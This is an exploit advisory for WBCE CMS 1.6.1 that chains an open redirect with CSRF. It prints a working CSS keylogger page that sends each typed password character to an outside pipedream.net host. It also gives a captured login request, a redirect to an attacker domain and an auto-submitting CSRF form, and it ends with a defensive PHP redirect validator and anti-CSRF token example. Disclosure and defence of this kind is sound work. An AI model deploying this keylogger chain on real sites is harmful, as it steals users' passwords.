WBCE CMS 1.6.1 Open Redirect & CSRF

2023.07.03
Risk: Low
Local: No
Remote: Yes
CVE: N/A

Exploit Title: WBCE CMS 1.6.1 - Open Redirect & CSRF
Version: 1.6.1
Bugs: Open Redirect + CSRF = CSS KEYLOGGING
Technology: PHP
Vendor URL: https://wbce-cms.org/
Software Link: https://github.com/WBCE/WBCE_CMS/releases/tag/1.6.1
Date of found: 03-07-2023
Author: Mirabbas Ağalarov
Tested on: Linux

2. Technical Details & POC
========================================

1. Login to Account
2. Go to Media (http://localhost/WBCE_CMS-1.6.1/wbce/admin/media/index.php#elf_l1_Lw)
3. Then upload an HTML file (the HTML file content is as below):

'''
<html>
<head>
<title> Login </title>
<style>
input[type="password"][value*="q"]{ background-image: url('https://enflownwx6she.x.pipedream.net/q');}
input[type="password"][value*="w"]{ background-image: url('https://enflownwx6she.x.pipedream.net/w');}
input[type="password"][value*="e"]{ background-image: url('https://enflownwx6she.x.pipedream.net/e');}
input[type="password"][value*="r"]{ background-image: url('https://enflownwx6she.x.pipedream.net/r');}
input[type="password"][value*="t"]{ background-image: url('https://enflownwx6she.x.pipedream.net/t');}
input[type="password"][value*="y"]{ background-image: url('https://enflownwx6she.x.pipedream.net/y');}
input[type="password"][value*="u"]{ background-image: url('https://enflownwx6she.x.pipedream.net/u');}
input[type="password"][value*="i"]{ background-image: url('https://enflownwx6she.x.pipedream.net/i');}
input[type="password"][value*="o"]{ background-image: url('https://enflownwx6she.x.pipedream.net/o');}
input[type="password"][value*="p"]{ background-image: url('https://enflownwx6she.x.pipedream.net/p');}
input[type="password"][value*="a"]{ background-image: url('https://enflownwx6she.x.pipedream.net/a');}
input[type="password"][value*="s"]{ background-image: url('https://enflownwx6she.x.pipedream.net/s');}
input[type="password"][value*="d"]{ background-image: url('https://enflownwx6she.x.pipedream.net/d');}
input[type="password"][value*="f"]{ background-image: url('https://enflownwx6she.x.pipedream.net/f');}
input[type="password"][value*="g"]{ background-image: url('https://enflownwx6she.x.pipedream.net/g');}
input[type="password"][value*="h"]{ background-image: url('https://enflownwx6she.x.pipedream.net/h');}
input[type="password"][value*="j"]{ background-image: url('https://enflownwx6she.x.pipedream.net/j');}
input[type="password"][value*="k"]{ background-image: url('https://enflownwx6she.x.pipedream.net/k');}
input[type="password"][value*="l"]{ background-image: url('https://enflownwx6she.x.pipedream.net/l');}
input[type="password"][value*="z"]{ background-image: url('https://enflownwx6she.x.pipedream.net/z');}
input[type="password"][value*="x"]{ background-image: url('https://enflownwx6she.x.pipedream.net/x');}
input[type="password"][value*="c"]{ background-image: url('https://enflownwx6she.x.pipedream.net/c');}
input[type="password"][value*="v"]{ background-image: url('https://enflownwx6she.x.pipedream.net/v');}
input[type="password"][value*="b"]{ background-image: url('https://enflownwx6she.x.pipedream.net/b');}
input[type="password"][value*="n"]{ background-image: url('https://enflownwx6she.x.pipedream.net/n');}
input[type="password"][value*="m"]{ background-image: url('https://enflownwx6she.x.pipedream.net/m');}
input[type="password"][value*="Q"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Q');}
input[type="password"][value*="W"]{ background-image: url('https://enflownwx6she.x.pipedream.net/W');}
input[type="password"][value*="E"]{ background-image: url('https://enflownwx6she.x.pipedream.net/E');}
input[type="password"][value*="R"]{ background-image: url('https://enflownwx6she.x.pipedream.net/R');}
input[type="password"][value*="T"]{ background-image: url('https://enflownwx6she.x.pipedream.net/T');}
input[type="password"][value*="Y"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Y');}
input[type="password"][value*="U"]{ background-image: url('https://enflownwx6she.x.pipedream.net/U');}
input[type="password"][value*="I"]{ background-image: url('https://enflownwx6she.x.pipedream.net/I');}
input[type="password"][value*="O"]{ background-image: url('https://enflownwx6she.x.pipedream.net/O');}
input[type="password"][value*="P"]{ background-image: url('https://enflownwx6she.x.pipedream.net/P');}
input[type="password"][value*="A"]{ background-image: url('https://enflownwx6she.x.pipedream.net/A');}
input[type="password"][value*="S"]{ background-image: url('https://enflownwx6she.x.pipedream.net/S');}
input[type="password"][value*="D"]{ background-image: url('https://enflownwx6she.x.pipedream.net/D');}
input[type="password"][value*="F"]{ background-image: url('https://enflownwx6she.x.pipedream.net/F');}
input[type="password"][value*="G"]{ background-image: url('https://enflownwx6she.x.pipedream.net/G');}
input[type="password"][value*="H"]{ background-image: url('https://enflownwx6she.x.pipedream.net/H');}
input[type="password"][value*="J"]{ background-image: url('https://enflownwx6she.x.pipedream.net/J');}
input[type="password"][value*="K"]{ background-image: url('https://enflownwx6she.x.pipedream.net/K');}
input[type="password"][value*="L"]{ background-image: url('https://enflownwx6she.x.pipedream.net/L');}
input[type="password"][value*="Z"]{ background-image: url('https://enflownwx6she.x.pipedream.net/Z');}
input[type="password"][value*="X"]{ background-image: url('https://enflownwx6she.x.pipedream.net/X');}
input[type="password"][value*="C"]{ background-image: url('https://enflownwx6she.x.pipedream.net/C');}
input[type="password"][value*="V"]{ background-image: url('https://enflownwx6she.x.pipedream.net/V');}
input[type="password"][value*="B"]{ background-image: url('https://enflownwx6she.x.pipedream.net/B');}
input[type="password"][value*="N"]{ background-image: url('https://enflownwx6she.x.pipedream.net/N');}
input[type="password"][value*="M"]{ background-image: url('https://enflownwx6she.x.pipedream.net/M');}
input[type="password"][value*="1"]{ background-image: url('https://enflownwx6she.x.pipedream.net/1');}
input[type="password"][value*="2"]{ background-image: url('https://enflownwx6she.x.pipedream.net/2');}
input[type="password"][value*="3"]{ background-image: url('https://enflownwx6she.x.pipedream.net/3');}
input[type="password"][value*="4"]{ background-image: url('https://enflownwx6she.x.pipedream.net/4');}
input[type="password"][value*="5"]{ background-image: url('https://enflownwx6she.x.pipedream.net/5');}
input[type="password"][value*="6"]{ background-image: url('https://enflownwx6she.x.pipedream.net/6');}
input[type="password"][value*="7"]{ background-image: url('https://enflownwx6she.x.pipedream.net/7');}
input[type="password"][value*="8"]{ background-image: url('https://enflownwx6she.x.pipedream.net/8');}
input[type="password"][value*="9"]{ background-image: url('https://enflownwx6she.x.pipedream.net/9');}
input[type="password"][value*="0"]{ background-image: url('https://enflownwx6she.x.pipedream.net/0');}
input[type="password"][value*="-"]{ background-image: url('https://enflownwx6she.x.pipedream.net/-');}
input[type="password"][value*="."]{ background-image: url('https://enflownwx6she.x.pipedream.net/.');}
input[type="password"][value*="_"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%60');}
input[type="password"][value*="@"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%40');}
input[type="password"][value*="?"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3F');}
input[type="password"][value*=">"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3E');}
input[type="password"][value*="<"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3C');}
input[type="password"][value*="="]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3D');}
input[type="password"][value*=":"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3A');}
input[type="password"][value*=";"]{ background-image: url('https://enflownwx6she.x.pipedream.net/%3B');}
</style>
</head>
<body>
<label>Please enter username and password</label>
<br><br>
Password:: <input type="password" />
<script>
document.querySelector('input').addEventListener('keyup', (evt)=>{
  evt.target.setAttribute('value', evt.target.value);
})
</script>
</body>
</html>
'''

4. Then go to the URL of the uploaded HTML file (http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html) and copy the URL.
5. Then log out and go to the login page again (http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php). The login request looks like this:

POST /WBCE_CMS-1.6.1/wbce/admin/login/index.php HTTP/1.1
Host: localhost
Content-Length: 160
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: phpsessid-2729-sid=3i7oqonhjf0ug0jl5dfdp4uugg
Connection: close

url=&username_fieldname=username_3584B221EC89&password_fieldname=password_3584B221EC89&username_3584B221EC89=test&password_3584B221EC89=Hello123%21&submit=Login

6. If you set the url parameter of the above request to https://ATTACKER.com, you are redirected to attacker.com.
7. We set the url parameter to the URL of the uploaded HTML file: url=http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html
8. And create a CSRF PoC with csrf.poc.generator:

<html>
<title> This CSRF was found by miri </title>
<body>
<h1> CSRF POC </h1>
<form action="http://localhost/WBCE_CMS-1.6.1/wbce/admin/login/index.php" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="url" value="http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html" />
</form>
<script>document.forms[0].submit();</script>
</body>
</html>

9. If the victim clicks it, they are redirected to the HTML file, and that page sends all of the victim's keyboard activity to my server.

Poc video: https://youtu.be/m-x_rYXTP9E
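The chain above rests on two server-side weaknesses: the login handler redirects to whatever the url parameter contains, and the login form accepts a cross-site POST. The PHP below is an added example written for this page, not WBCE CMS's own code; it shows a redirect validator that only accepts paths under the admin area (so even a same-host redirect into /media/ is refused) and a per-session anti-CSRF token for the login form. ADMIN_BASE is taken from the advisory's test URLs, the session key name csrf_token and the handler glue at the bottom are assumptions, and PHP 8 is assumed for str_starts_with.

```php
<?php
// Added example, not WBCE CMS code. Hardens the unvalidated "url" redirect and
// the token-less login form described in the advisory. Assumes PHP 8 and that
// post-login redirects are only ever meant to land inside the admin area.
declare(strict_types=1);

const ADMIN_BASE = '/WBCE_CMS-1.6.1/wbce/admin/';   // prefix seen in the advisory's URLs

/**
 * Return $candidate if it is a plain site-local path under $base, else $fallback.
 * Everything a browser could resolve to another origin or another area is refused.
 */
function safe_redirect_target(?string $candidate, string $base, string $fallback): string
{
    if ($candidate === null || $candidate === '') {
        return $fallback;
    }
    // Control characters, whitespace and backslashes: header injection and
    // parser disagreements ("/\evil.com" is "//evil.com" to a browser).
    if (preg_match('/[\x00-\x20\x7f\\\\]/', $candidate)) {
        return $fallback;
    }
    // Any scheme prefix (http:, https:, javascript:, data:) is an absolute URL.
    if (preg_match('#^[a-z][a-z0-9+.-]*:#i', $candidate)) {
        return $fallback;
    }
    // Protocol-relative "//host/..." would also leave the site.
    if (str_starts_with($candidate, '//')) {
        return $fallback;
    }
    // Must be rooted inside the admin area; this is what blocks the advisory's
    // same-host redirect into the media directory.
    $path = parse_url($candidate, PHP_URL_PATH);
    if (!is_string($path) || !str_starts_with($path, $base)) {
        return $fallback;
    }
    // No dot segments, so ".../admin/../media/x.html" cannot escape the prefix.
    foreach (explode('/', $path) as $segment) {
        if ($segment === '..' || $segment === '.') {
            return $fallback;
        }
    }
    return $candidate;
}

/** Issue (or reuse) the per-session anti-CSRF token to embed in the login form. */
function csrf_token(): string
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));   // 256-bit random token
    }
    return $_SESSION['csrf_token'];
}

/** Constant-time comparison of the submitted token against the session copy. */
function csrf_check(?string $submitted): bool
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && $submitted !== null && hash_equals($expected, $submitted);
}

// Hypothetical glue for the login handler (WBCE's real handler is not shown here).
// The form must carry: <input type="hidden" name="csrf_token" value="<?= htmlspecialchars(csrf_token()) ?>">
if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_check($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        exit('Invalid request token');
    }
    // ... verify the submitted credentials here ...
    $target = safe_redirect_target($_POST['url'] ?? null, ADMIN_BASE, ADMIN_BASE);
    header('Location: ' . $target, true, 303);
    exit;
}

// CLI self-check: the advisory's payloads and a few variants are rejected,
// a genuine admin path (constructed from the advisory's media URL) passes.
if (PHP_SAPI === 'cli') {
    $cases = [
        'https://ATTACKER.com',                                          // step 6
        'http://localhost/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html',  // step 7
        '/WBCE_CMS-1.6.1/wbce/media/css-keyloger.html',                  // same host, wrong area
        '//attacker.example/',
        '/WBCE_CMS-1.6.1/wbce/admin/../media/css-keyloger.html',
        "/WBCE_CMS-1.6.1/wbce/admin/\r\nSet-Cookie: x=1",
        '/WBCE_CMS-1.6.1/wbce/admin/media/index.php?x=1',                // legitimate
    ];
    foreach ($cases as $c) {
        printf("%s -> %s\n", json_encode($c), safe_redirect_target($c, ADMIN_BASE, ADMIN_BASE));
    }
}
```

Run with `php redirect_hardening.php` to see every hostile case collapse to ADMIN_BASE while the admin path is returned unchanged. Note that the validator alone would still allow an attacker-controlled page if one could be uploaded under the admin prefix, so the third link in the chain, HTML files being served as text/html out of the media directory, is best closed at upload time as well (keep .html and similar active formats out of the media allowlist, or serve that directory with Content-Disposition: attachment).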


Copyright 2024, cxsecurity.com